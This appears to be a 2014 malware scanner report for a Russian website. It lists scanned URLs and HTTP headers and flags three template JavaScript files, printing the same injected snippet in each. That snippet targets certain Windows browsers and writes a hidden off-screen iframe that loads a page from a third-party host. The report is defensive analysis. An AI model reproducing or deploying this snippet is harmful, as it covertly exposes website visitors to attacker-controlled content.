
Malware Scanner report for goriyuga.ru

Malicious/Suspicious/Total urls checked
3/0/17
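3 pages have malicious code; see the details below. All three are JavaScript files carrying the same injected snippet, which adds an off-screen iframe at run time via document.write — presumably why the static iFrames count in this summary reports 0 hidden iframes.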
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://www.goriyuga.ru/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Location: http://goriyuga.ru/
Server: nginx/1.4.7
Content-Length: 0
Content-Type: text/html
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=fd0f62a386006e0d7386a043cf3f9661; path=/
X-Powered-By: PHP/5.2.17
clean
http://goriyuga.ru/
200 OK
Content-Length: 43007
Content-Type: text/html
clean
http://goriyuga.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/core.js
200 OK
Content-Length: 5384
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/caption.js
200 OK
Content-Length: 1329
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 599
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery-162.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery.easing.min.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/supersized.3.2.1.js
200 OK
Content-Length: 37941
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Injected snippet that the scanner reports as malicious for this file
// (Sophos: Troj/JSRedir-OI). It reads the visitor's user-agent string and,
// for a selected subset of browsers, writes an off-screen iframe that loads a
// document from a third-party host. Takes no arguments and returns nothing.
// Cleanup indicators visible here: the function name, a document.write of an
// iframe with negative absolute offsets, and the iframe's host.
function Grandarium() {
// The user-agent string is the only input to the targeting decision below.
var soset = navigator.userAgent;
// Misleadingly named flag: true means "skip this visitor". It is true when the
// user agent contains "IEMobile" or "Chrome", or when "Windows" is absent or at
// index 0 ("< +1" is simply "< 1", so indexOf results of -1 and 0 both match).
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
// Reached only for user agents that contain "Windows" past index 0 and contain
// neither "Chrome" nor "IEMobile".
if (!unicode) {
// The inline style positions the 138x138 frame absolutely at top/left -888px,
// i.e. above and to the left of the page origin, so it is not visible to the
// visitor while its src document still loads.
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
// Called immediately when the script file is evaluated, so the check runs on
// every page that includes this file.
Grandarium();
... 3491 bytes are skipped ...
1,

slide_links : 1, thumb_links : 1, show_bottombar : 1, show_prevnextbutton : 1, show_slidecounter : 0, show_imagetitle : 1, show_playbutton : 1, show_progressbar : 1, thumbnail_navigation : 0
};

// Registers the plugin entry point on jQuery.fn: for each element in the
// matched set, a new jQuery.supersized instance is constructed with the
// caller's options. The instance is not stored or returned here.
jQuery.fn.supersized = function(options){
// The value returned to the caller is whatever this.each(...) returns.
return this.each(function(){
(new jQuery.supersized(options));
});
};

})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.goriyuga.ru/templates/full_screen_4/lib/js/theme/supersized.shutter.js
200 OK
Content-Length: 12530
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/UvumiDropdown.js
200 OK
Content-Length: 5930
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Injected snippet that the scanner reports as malicious for this file
// (Sophos: Troj/JSRedir-OI). It gates on the visitor's user-agent string and,
// when the gate passes, writes an off-screen iframe pointing at a third-party
// host. Takes no arguments and returns nothing.
function Grandarium() {
// Targeting is decided from the user-agent string alone.
var soset = navigator.userAgent;
// Despite its name, this flag means "do not inject": it is true for user agents
// containing "IEMobile" or "Chrome", and for those where "Windows" is missing
// or at index 0 ("< +1" is equivalent to "< 1").
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
// Injection path: user agent contains "Windows" (past index 0) and neither
// "Chrome" nor "IEMobile".
if (!unicode) {
// Absolute positioning at -888px top and left keeps the 138x138 frame outside
// the visible page area; the framed document is still fetched.
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
// Runs as soon as the script file is evaluated.
Grandarium();
... 3739 bytes are skipped ...
,99);e.start(g)},hideChildList:function(b){var c=b.retrieve('animation');var d=b.getFirst('ul');var e=$$(d.getChildren('li'));var f=0;var g={};e.each(function(a,i){g[i+1]={top:-f,opacity:0};f+=a.getSize().y});b.setStyle('z-index',1);if(b.getParent('ul')!=this.menu||this.options.mode=='vertical'){g[1]=null;c.cancel();c.start(g);var h={0:{opacity:0},1:{opacity:0}};if(this.rtl){h[0]['marginRight']=-d.getSize().x}else{h[0]['marginLeft']=-d.getSize().x}c.start(h)}else{g[0]={opacity:0};c.start(g)}}});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.goriyuga.ru/templates/full_screen_4/lib/js/tooltips.js
200 OK
Content-Length: 1135
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Injected snippet that the scanner reports as malicious for this file
// (Sophos: Troj/JSRedir-OI). It checks the visitor's user-agent string and, for
// the browsers it selects, writes an off-screen iframe that loads a document
// from a third-party host. Takes no arguments and returns nothing.
function Grandarium() {
// Only navigator.userAgent is consulted to decide whether to inject.
var soset = navigator.userAgent;
// The name is a decoy; the flag is an exclusion test. True when the user agent
// contains "IEMobile" or "Chrome", or when indexOf("Windows") is -1 or 0
// (the comparison "< +1" is the same as "< 1").
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
// Executes only when the user agent contains "Windows" past index 0 and
// contains neither "Chrome" nor "IEMobile".
if (!unicode) {
// The frame is 138x138 but placed at top/left -888px with absolute
// positioning, so it sits outside the visible page area.
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
// Invoked immediately on script evaluation, before the rest of the file runs.
Grandarium();
... 78 bytes are skipped ...
on(element,index) {
var content = element.get('title').split('::');
element.store('tip:title', content[0]);
element.store('tip:text', content[1]);
});

var tipz = new Tips('.tips',{
className: 'tips',
fixed: true,
hideDelay: 50,
showDelay: 50
});

tipz.addEvents({
'show': function(tip) {
tip.fade('in');
},
'hide': function(tip) {
tip.fade('out');
}
});
});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://stg.odnoklassniki.ru/share/odkl_share.js
200 OK
Content-Length: 12312
Content-Type: application/x-javascript
clean
http://vk.com/js/api/share.js?11
500 timeout
Content-Length: 30
Content-Type: text/plain
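clean (the request timed out, so the scanner most likely did not retrieve this script; treat the verdict as "not scanned" rather than as a confirmed clean result)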
http://vk.com/test404page.js
404 Not Found
Content-Length: 410
Content-Type: text/html
clean
http://vk.com/
HTTP/1.1 200 OK
Cache-Control: no-store
Connection: close
Date: Fri, 05 Sep 2014 18:05:31 GMT
Pragma: no-cache
Server: nginx/1.2.4
Content-Length: 16988
Content-Type: text/html; charset=windows-1251
Set-Cookie: remixlang=3; expires=Sat, 05 Sep 2015 15:12:15 GMT; path=/; domain=.vk.com
X-Frame-Options: deny
X-Powered-By: PHP/3.7744
clean
http://vk.com/badbrowser.php
200 OK
Content-Length: 3524
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: goriyuga.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=8ef6380e6b06139cf36449c381f9fa9a; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: goriyuga.ru
Referer: http://www.google.com/search?q=goriyuga.ru

Result:
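The result is similar to the first query; no suspicious redirects were found. Note that this check only compares the server's responses with and without a search-engine Referer; it does not exercise the user-agent-gated script injection reported above, which runs in the visitor's browser.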

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=goriyuga.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://goriyuga.ru/

Result: goriyuga.ru is not infected or malware details are not published yet.